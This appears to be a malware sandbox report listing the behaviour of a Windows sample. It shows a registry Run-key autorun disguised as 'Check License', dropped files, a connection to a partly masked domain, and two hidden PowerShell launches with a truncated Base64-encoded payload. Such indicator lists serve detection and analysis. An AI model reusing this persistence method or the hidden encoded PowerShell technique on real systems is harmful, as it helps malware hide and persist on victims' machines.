Technical Information
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'Check License' = '%TEMP%\write.exe'
- '%TEMP%\write.exe'
- '%ProgramFiles%\microsoft office\office14\clview.exe' "EXCEL" "Microsoft Excel"
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.lck
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\toc[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\ont.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\ont[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\script.js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\script[1].js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\contenthxs.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\contenthxs[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvtitlebg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\clvtitlebg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvbluebg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clvbluebg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvgraybg.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\clvgraybg[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\toc.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\offlineclientviewer.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\offlineclientviewer.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\offlineclientviewer[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clvimagepanemedia.jpg
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clvimagepanemedia[1].jpg
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\cvglobal.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\cvglobal[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\cvglobalstrings.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\cvglobalstrings[1].xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\bullet.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\bullet[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clv14titlebarbg.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\clv14titlebarbg[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-lsd.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\offlineclientviewer[1].xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\tbgradient[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\tbgradient.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\search[1].xsl
- %LOCALAPPDATA%\microsoft\windows\history\history.ie5\mshist012022070820220709\index.dat
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\browse0.excel.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\back.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\back[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\back2.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\back2[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\bulletl.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\bulletl[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\errexcl.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\errexcl[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\help.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\help[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\helpid.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\helpid[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\logo.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\logo[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\message.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\message[1].xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\next.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\next[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\next2.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\next2[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\online.gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\online[1].gif
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\content.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\content[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\office12.js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\office12[1].js
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\search.xsl
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\page-lsd[1].png
- %TEMP%\write.exe
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-lsh.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-rsd.png
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_k.hxw
- %TEMP%\imt9ee7.tmp
- %TEMP%\imt9ec7.tmp
- %TEMP%\imt9ec6.tmp
- %TEMP%\imt9ea5.tmp
- %TEMP%\imt9e85.tmp
- %TEMP%\imt9e65.tmp
- %TEMP%\imt9e64.tmp
- %TEMP%\imt9e34.tmp
- %TEMP%\imt9e33.tmp
- %TEMP%\imt9e32.tmp
- %TEMP%\imt9e21.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_f.hxw
- %TEMP%\imt9f07.tmp
- %TEMP%\imt9e11.tmp
- %TEMP%\imt9de0.tmp
- %TEMP%\imt9dc0.tmp
- %TEMP%\imt9daf.tmp
- %TEMP%\imt9dae.tmp
- %TEMP%\imt9d9e.tmp
- %TEMP%\imt9d9d.tmp
- %TEMP%\imt9d8c.tmp
- %TEMP%\imt9d6c.tmp
- %TEMP%\imt9d5b.tmp
- %TEMP%\imt9d5a.tmp
- %TEMP%\imt9d4a.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mtoc_excel_col.hxh
- %TEMP%\imt9d39.tmp
- %TEMP%\imt9df1.tmp
- %TEMP%\imt9f08.tmp
- %TEMP%\imt9f19.tmp
- %TEMP%\imt9f1a.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\page-rsd[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\page-rsh.png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\caasbycl\page-rsh[1].png
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\ontrtl.css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\0u8lpyu9\ontrtl[1].css
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\localhelp.txt
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\localhelp[1].txt
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\msofficehelp14\moha0c3.tmp\clientviewersettings.xml
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\bzjx5bke\clientviewersettings[1].xml
- %TEMP%\imta093.tmp
- %TEMP%\imta083.tmp
- %TEMP%\imta053.tmp
- %TEMP%\imta052.tmp
- %TEMP%\imta051.tmp
- %TEMP%\imta040.tmp
- %TEMP%\imta03f.tmp
- %TEMP%\imta03e.tmp
- %TEMP%\imt9fe0.tmp
- %TEMP%\imt9fdf.tmp
- %TEMP%\imt9fce.tmp
- %TEMP%\imt9fbe.tmp
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.hxd
- %TEMP%\imt9fad.tmp
- %TEMP%\imt9f8d.tmp
- %TEMP%\imt9f7c.tmp
- %TEMP%\imt9f5c.tmp
- %TEMP%\imt9f5b.tmp
- %TEMP%\imt9f4a.tmp
- %TEMP%\imt9f3a.tmp
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\re1n75kr\page-lsh[1].png
- %ALLUSERSPROFILE%\tryxaebx
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mtoc_excel_col.hxh
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_f.hxw
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mkwd_k.hxw
- %ALLUSERSPROFILE%\microsoft help\ms.excel.14.1033_1033_mvalidator.hxd
- 'sk####ortemp.site':443
- 'sk####ortemp.site':443
- DNS ASK sk####ortemp.site
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebCheckMonitor' WindowName: ''
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -version 2 -w hidden -nopro -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIA...' (with hidden window)
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -version 2 -w hidden -nopro -enc JABBADEAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAiAEMAOgBcAFAAcgBvAGcAcgBhAG0ARABhAHQAYQBcAFQAUgBZAHgAYQBFAGIA...